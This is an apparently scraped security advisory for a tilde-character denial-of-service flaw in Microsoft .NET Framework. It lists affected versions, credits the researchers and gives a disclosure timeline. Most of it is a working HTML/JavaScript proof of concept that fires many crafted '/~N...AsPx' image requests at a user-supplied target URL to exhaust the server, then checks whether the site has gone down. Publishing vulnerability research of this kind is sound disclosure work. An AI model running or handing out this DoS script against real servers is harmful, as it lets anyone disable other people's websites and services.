扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 |
Paper: http://www.exploit-db.com/docs/19527.pdf Security Research - .Net Framework Tilde Character DoS Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows. It includes a large library and provides language interoperability across several programming languages." (Wikipedia) II. DESCRIPTION --------------------- Vulnerability Research Team discovered avulnerability in Microsoft .NET Framework. The vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers to Deny the functionality of the server. III. AFFECTED PRODUCTS --------------------------- .Net Framework 1.0 Windows XP .Net Framework 1.1 Windows 2003 .Net Framework 2.0 Windows 2003 R2 .Net Framework 3.0 Windows 2008 .Net Framework 3.5 Windows 2008 R2 .Net Framework 4.0 Windows 2008 R2,Windows 7 IV. Binary Analysis & Exploits/PoCs --------------------------------------- In-depth technical analysis of the vulnerability and a functional exploit are available through: http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/ V. SOLUTION ---------------- There are still workarounds through Vendor and security vendors. VI. CREDIT -------------- This vulnerability was discovered by: Soroush Dalili (@irsdl) Ali Abbasnejad VII. REFERENCES ---------------------- http://support.microsoft.com/kb/142982/en-us http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/ VIII. DISCLOSURE TIMELINE ----------------------------- 2010-08-01 - Vulnerability Discovered 2010-08-03 - Vendor Informed 2010-12-01 - Vendor 1st Response 2011-01-04 - Vendor 2nd Response (next version fix) 2012-06-29 - Public Disclosure Proof of Concept: <html> <head> <script> var requestNumber = 10; // enough for the test - otherwise it may stop your .Net framework completely var tempValue = "A"; while(tempValue.length<4000){ // 4096 then! tempValue+=tempValue; } var errorFlag; var from_time; var to_time; function testTheTarget(strTarget,intValidFolderCount,intLoopNumber,HTMLElementDest){ HTMLElementDest.innerHTML = ''; errorFlag = 0; from_time = new Date(); from_time = from_time.getTime(); if (isTargetValid(strTarget)){ if (isNaN(intValidFolderCount)) intValidFolderCount = 100; if (isNaN(intLoopNumber)) intLoopNumber = 100; requestNumber = intLoopNumber; var div = document.createElement("div"); for(var i=0; i<requestNumber;i++){ var testTempValue = tempValue.substring(0,intValidFolderCount-1); testTempValue = testTempValue.replace(/A/gi,"/~"+Math.floor(Math.random()*10)+""); testTempValue+=".AsPx?aspxerrorpath=/"; testTempValue="/"+(new Date()).getMilliseconds()+"~"+Math.floor(Math.random()*10) + testTempValue var img = createElement("img","img_"+i); if(i==requestNumber-1) { img.onerror = function(){ to_time = new Date(); to_time = to_time.getTime(); var msecs = (to_time - from_time); if(!errorFlag && msecs < 100*requestNumber+5000){ errorFlag = 1; if(intValidFolderCount>=150) alert('As you can see this message, you probably need to decrease the Maximum Valid Folder number.'); else if(intValidFolderCount>=50){ alert('First increase the Maximum Valid Folder number to see the behaviour, then decrease it to lower than '+intValidFolderCount+' and then see the behaviour.'); }else alert('The response was too quick. This server probably is not vulnerable.'); }} } img.src = strTarget + testTempValue; div.appendChild(img); } HTMLElementDest.appendChild(div); }else{ alert('Your target URL is not valid. Examples: \nhttp://www.aspnet-example.com/ \nor \nhttps://www.aspnet-example.com/'); } }; var myTargetWindow; var objSetTimeout; function openInNewWin(strTarget){ clearTimeout(objSetTimeout); if(isTargetValid(strTarget)){ myTargetWindow = window.open(strTarget,'_blank'); objSetTimeout = setTimeout('isServerAlive()',10000); } } function isServerAlive(){ try{ var dummy = myTargetWindow.location; if(myTargetWindow.location.toString().indexOf('//localhost') < 0) alert('No response from the server! Seems dead to me!'); }catch(e){ // Nothing ... it is alive and safe... } } function isTargetValid(strTarget){ var result = false; try{ if(strTarget.substring(0,7).toLowerCase() == "http://" || strTarget.substring(0,8).toLowerCase() == "https://"){ result = true; } }catch(e){} return result; }; function createElement(elmType,elmName){ var element; if(elmName=='') { element = document.createElement(elmType); } else { try { element = document.createElement('<'+elmType+' name="'+elmName+' id="'+elmName+'">'); } catch (ex) { element = document.createElement(elmType); element.name=elmName; element.id=elmName; }; }; return element; }; </script> </head> <body> You have to monitor the server performance manually:<br/> Target website: <input type="text" name="target" id="target" value="http://localhost/"/> Example: http://www.aspnet-example.com/ or https://www.aspnet-example.com/ - Do not include filename<br/> Maximum valid folder that can be added to your target: <input type="text" name="validfoldercount" id="validfoldercount" value="200"/> before receiving URL Too Long error<br/> Loop Number: <input type="text" name="loopnumber" id="loopnumber" value="100"/> be careful as it can kill your server.<br/> <input type="button" value="Test it" onclick="testTheTarget(document.getElementById('target').value,document.getElementById('validfoldercount').value,document.getElementById('loopnumber').value,document.getElementById('playground'))"/> <input type="button" value="Open the target website" onclick="openInNewWin(document.getElementById('target').value)"/><br/> <div style="visibility:hidden;" name="playground" id="playground"> Hidden Div! -playground- </div> <br/><br/><br/><br/> We do not accept any responsibility for bad usage of this PoC. Please only run it against your own server/websites. <br/><br/> Main reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a> </body> </html> |
体验盒子
